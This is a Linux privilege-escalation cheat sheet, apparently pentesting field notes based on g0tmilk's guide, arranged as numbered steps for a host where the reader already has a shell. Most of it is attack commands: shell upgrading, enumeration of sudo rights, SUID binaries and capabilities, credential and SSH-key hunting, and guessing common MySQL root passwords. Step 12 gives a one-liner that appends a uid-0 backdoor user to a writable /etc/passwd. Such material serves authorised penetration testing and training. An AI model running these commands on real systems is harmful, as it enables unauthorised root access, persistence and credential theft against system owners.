Privilege Escalation

Based on g0tmilk’s Guide to Linux Privilege Escalation + additional field notes.


Step 1: Upgrade Your Shell

Make your shell more stable & interactive:

python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
alias ll='ls -lsaht --color=auto'

# Background and fix terminal
Ctrl + Z
stty raw -echo; fg; reset
stty columns 200 rows 200

Step 2: Enumeration – System Context

Capabilities & Tooling

which gcc
which cc
which python
which perl
which wget
which curl
which fetch
which nc
which ncat
which nc.traditional
which socat

Compilation / System Info

file /bin/bash
uname -a
cat /etc/*-release
cat /etc/issue

Arch & Kernel

file /bin/bash
uname -a

Step 3: User Context

Are we a real user?

sudo -l
ls -lsaht /etc/sudoers
groups <user>
env

Users & homes:

cd /home/ && ls -lsaht

Step 4: Credentials & Configs

Check for web creds:

cd /var/www/html/ && ls -lsaht

Check /etc/ for unusual configs:

ls -lsaht /etc/
ls -lsaht /etc/ | grep -i '\.conf'
ls -lsaht /etc/ | grep -i '\.secret'

SSH keys:

ls -lsaR /home/

Other dirs of interest:

ls -lsaht /var/lib/
ls -lsaht /var/db/
ls -lsaht /opt/
ls -lsaht /tmp/
ls -lsaht /var/tmp/
ls -lsaht /dev/shm/

Step 5: Escalation Primitives

SUID / GUID

find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null

Check exploitation paths: GTFOBins

File Capabilities

getcap -r / 2>/dev/null

Reference: Linux File Capabilities


Step 6: Process & Cron Monitoring

Running Processes

ps aux | grep -i root --color=auto

Network

netstat -antup
netstat -tunlp

Cron Jobs

crontab -u root -l
cat /etc/crontab
ls /etc/cron.*

Process Monitoring (pspy)

# On attacker machine:
cd /var/tmp/
# Transfer pspy
chmod 755 pspy64
./pspy64

pspy


Step 7: Databases

Check for MySQL root creds:

mysql -uroot -p
# Try common passwords:
# root, toor, (empty)

Step 8: File Transfers

Check what’s available:

which wget
which curl
which nc
which fetch
ls -lsaht /bin/ | grep -i 'ftp'

Step 9: NFS

Check for exports:

cat /etc/exports

👉 Look for no_root_squashAttacking NFS Shares


Step 10: Persistence / Living on Host

Writable locations:

  • /var/tmp/

  • /tmp/

  • /dev/shm/

Check mounts:

cat /etc/fstab

Step 11: Local Port Forwards

If vulnerable services are only on 127.0.0.1:


Step 12: Direct Root via /etc/passwd

If writable:

openssl passwd -1 i<3hacking
# Example output: $1$/UTMXpPC$Wrv6PM4eRHhB1/m1P.t9l.
echo 'siren:$1$/UTMXpPC$Wrv6PM4eRHhB1/m1P.t9l.:0:0:siren:/home/siren:/bin/bash' >> /etc/passwd
su siren
id

Step 13: Miscellaneous

  • Mail:

    cd /var/mail/
    cd /var/spool/mail/
    ls -lsaht
  • Files by specific user (ex: bob):

    find / -user bob 2>/dev/null

Tools

Last updated